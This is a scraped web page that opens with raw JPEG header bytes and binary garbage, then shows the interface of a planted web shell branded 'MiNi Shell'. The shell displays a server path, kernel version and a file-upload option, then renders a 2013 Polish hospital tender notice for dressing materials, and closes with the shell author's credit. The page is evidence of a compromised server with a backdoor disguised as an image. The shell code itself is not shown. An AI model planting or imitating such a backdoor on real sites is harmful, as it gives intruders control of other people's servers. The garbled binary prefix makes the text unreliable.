JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130211/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130211/56266-N-2013.html

<p class="kh_header"><b>Morąg: Dostawa materiałów opatrunkowych do Szpitala Miejskiego w Morągu Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 56266 - 2013; data zamieszczenia: 11.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Miejski w Morągu Spółka z ograniczoną odpowiedzialnością , ul. Dąbrowskiego 16, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 89 7574231, faks 89 7574593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozmorag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych do Szpitala Miejskiego w Morągu Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.2. Zamawiający dopuszcza składanie ofert częściowych, gdzie część (zadanie) stanowi:
Pakiet 1- 19
Pakiet  1 . Gaza  i serwety  gazowe
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Gaza mb  szer 90 cm 13 -nitek	3360 mb
2	Gaza niewyjałowiona  1 m2  17- nitek	210 szt
3	Gaza niewyjałowiona  1/2 m2 17-nitek	70 szt
4	Gaza wyjałowiona  1 m2  17-nitek	4860 szt
5	Gaza wyjałowiona  1/2  m2  17 nitek	2980 szt
6	Serweta gaz. oper. n+t 17-nitek 6 w. z nitką RTG 45cmx45cm	2500szt
7	Serweta operacyjna jałowa  przyklejana 75 cm x 90 cm	120 szt
8	Serweta operacyjna jałowa   75 cm x 90 cm	60 szt

Pakiet  2 . Gaziki jałowe nasączone alkoholem 
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Gaziki do dezynfekcji skóry przed injeckcjami	1040 op

Pakiet  3. Gąbki żelatynowe przeciw krwotoczne
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Gąbka homeost. 80X50x10 mm -10 szt	10 op
2	Gąbka homeost. 80 x50 x 1 mm - 10 szt	7 op

Pakiet  4. Kompresy gazowe
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Kompr.n/jał.10 x 20 cm100szt,8w,17 nit+RTG 100szt	36 op
2	Kompr.n/jał.10 x 10 cm,100 szt 12 w,17nit+RTG100szt	85 op
3	Kompr.n/jał.10 x 20cm,100szt,16w,17nit+RTGkompresy100szt	18op
4	Kompr.n/jał.10 x 10cm,100szt,16w,17nit+RTG100szt	54op
5	Kompresy jałowe  5 x 5 cm a3szt,8w.,17nitk	380 op
6	Kompresy jałowe 7,5 x 7,5cm a3szt,8w,17n kompresy	2960 op
7	Kompresy niejalowe 10 x 10cm,100szt,8w,17n	486 op
8	Kompresy niejał. 7,5 x 7,5cm*100szt,8w,17n	640 op
9	Kompresy niejałowe 5 x 5 cm,100szt,8w 17n	2020 op

Pakiet  5.  Lignina
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Lignina  arkusze	940kg

Pakiet  6. Opaska dziana
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Opaska dziana podtrzym.4m x10 cm	8430 szt
2	Opaska dziana podtrzym.4m x 15 cm	4700 szt

Pakiet  7. Opaska elastyczna
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Opaska elastyczna 4m x 10 cm	600 szt
2	Opaska elastyczna 4m x15 cm	2390 szt

Pakiet  8. Opaska gipsowa
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Opaska gipsowa  3m x10 cm	850szt
2	Opaska gipsowa  3m x14cm	1120 szt
3	Opaska gipsowa  3m x15cm	300 szt

Pakiet  9. Opaski z waty syntetycznej pod  gips
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Opaska z waty syntetycz. 10cm x 3m	800 szt
2	Opaska z waty syntetycz.15cm x3m	1020 szt

Pakiet  10. Pieluchomajtki
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Pielucho-majtki  L x 30 szt	530 op

Pakiet  11. Przylepce
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Przylepiec (tkanina)2,5cm x 5m	12 szt
2	Przylepiec 25 cm x 10cm z opatr.jał.(włóknina)	180szt
3	Przylepiec 7cmx5cm z opatr. jal.przezr.szt(wodoodporny)	348 szt
4	Przylepiec do kaniul jal. opat.x 100 szt	250op
5	Przylepiec przezroczysty 10 cm *12 cm jał.	120 szt
6	Przylepiec zastęp. nici chir.0,6 cm*10 cm	120szt
7	Przylepiec (tkanina ) 1,25 cm x od 9m do 9,14 m	132 szt
8	Przylepiec (tkanina ) 5 cm x od 9m do  9,14 m	33 szt
9	Przylepiec (tkanina )2,5 cm od  9m do 9,14 m	144szt
10	Przylepiec (włóknina)10 m x 20 cm	55szt
11	Przylepiec (włóknina )2,5 cm x od 9m do 9,14 m	810szt
12	Przylepiec (włóknina ) 10 cm x 6 cm z opatr. Jał.	2900szt
13	Przylepiec(włóknina)15cmx 8cm z opatr.jal.1szt	1180szt
15	Przylepiec(włóknina)5cm x od 9 do 9,14m	73szt
16	Przylepiec(włóknina) o szer.1,25 cm x,od 9m  do 9,14 m	335 szt

Pakiet  12. Wata opatrunkowa
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Wata opatrunkowa  500 g	40 op

Pakiet  13. Podkłady dla dorosłych
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Podkład dla dorosłych 60cmx 90cm x 30 szt	200op

Pakiet  14. Opatrunki na trudno gojące się rany
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Hydrożel przeźrocz. z dozownikiem 15 g x10szt	2 op
2	Opatr. hydrokoloidowy do pięt i łokci 8  x 12 cm x10szt	6 op
3	Opatr.jał. z włókien poliestrowych z maścią 10 cm x 20 cm x 30 szt	11 op
4	Opatr.jał. siatkowy ze srebrem z maścią 10 x 10 x  10 szt	44 op
5	Opatr.jał.hydrokoloidowy   10 x 10cm x 10 szt	9 op
6	Opatr.jał.hydrokoloidowy do okol.krzyż  12 cm x 18 cm x 3 szt	9 op
7	Opatr.jał. hydrokoloidowy doran z lekk.wysięk 10 x 10 cm x 10 szt	30 op
8	Opatr.jal.aktywnie oczysczający rany 10 x 10 cm x 10 szt	39 op
9	Opatr.jal. aktywnie oczysczający rany o średnicy 4cm   x 10 szt	1op
10	Opatr.jał. z włókien. alginianów wapnia x 10 szt , rozmiar 10cmx10cm	11 op
11	Opatr.hydropolimer piankowy 10 cm x 10cm x 10szt	51 op


Pakiet  15. Opatrunki hydrożelowe na oparzenia
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Opatr.hydrożel.na oparz,ster,10 x 40cm	2szt
2	Opatrunek schładzający 20 x 45 cm	2szt

Pakiet  16. Siatki elastyczne
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Siatk.elast.opatr. Nr 3, 4.5 cm *10 m	1op
2	Siatk.elast.opatr.Nr 5, 6.5cmx25m	2op

Pakiet  17. Folia chirurgiczna bakteriobójcza
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Folia chir. bakteriobójcza 34 x 35 ,Ioban	100 szt
2	Folia chir.bakteriobójcza  56 x 45, loban	12szt

Pakiet  18. Tupfery
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Tupfery gazowe.(fasolki)z nitką RTG 15*15 cm	960szt
2	Tupfery gazowy.(kule) z nitką RTG 30*30 cm	4400 szt

Pakiet  19.  Siatki chirurgiczne
Lp.	Nazwa międzynarodowa	Ilości szacunkowe
1	Siatka chirurgiczna  6 x 11	50 szt
2	Siatka chirurgiczna  8 x 12	25 szt
3	Siatka chirurgiczna  6 x 11	10 szt

Wymagamy od Wykonawców realizowania dostaw zgodnie ze składanymi zamówieniami Niedopuszczalne jest wysyłanie asortymentu, który nie był objęty zamówieniem.
Zamówienia będą składane stosownie do aktualnych potrzeb Szpitala w okresie obowiązywania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.11-1, 33.14.11.12-8, 33.14.11.10-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 19.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie stawia szczegółowych wymagań dotyczących tego warunku;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wypełniony i podpisany formularz ofertowy  - załącznik nr 1  do SIWZ (w przypadku wątpliwości czy oferowany przedmiot zamówienia spełnia wymagania Zamawiającego zastrzegamy możliwość żądania próbek po jednej szt. danego asortymentu.                        
      2.w przypadku, gdy umocowanie do reprezentowania wykonawcy nie wynika ze stosownego   dokumentu, a w szczególności z odpisu z właściwego rejestru, należy załączyć stosowne pełnomocnictwo.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a /zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena   netto  pozostanie bez  zmian; 
 b/ zmian stawek opłat celnych wprowadzonych decyzjami odnośnych władz
 c/  Zmiany wymienione w ppkt a),b) następują z mocy prawa i obowiązują od dnia obowiązywania odpowiednich przepisów
 d/ strony dopuszczają zmianę cen jednostkowych preparatów objętych umową  w przypadku   zmiany wielkości opakowania wprowadzonej przez producenta  z zachowaniem zasady  proporcjonalności w stosunku do ceny objętej umową.
e/ strony dopuszczają możliwość przesunięć asortymentowych w ramach danego pakietu.
f/ przedłużenia terminu obowiązywania umowy do chwili wyczerpania się wartości umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozmorag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski w Morągu Sp.z o.o.
 Dąbrowskiego 16 
 14-300 Morąg
budynek administracji pokój nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2013 godzina 11:45, miejsce: Szpital Miejski w Morągu Sp.z o.o.
 Dąbrowskiego 16 
 14-300 Morąg
budynek administracji pokój nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com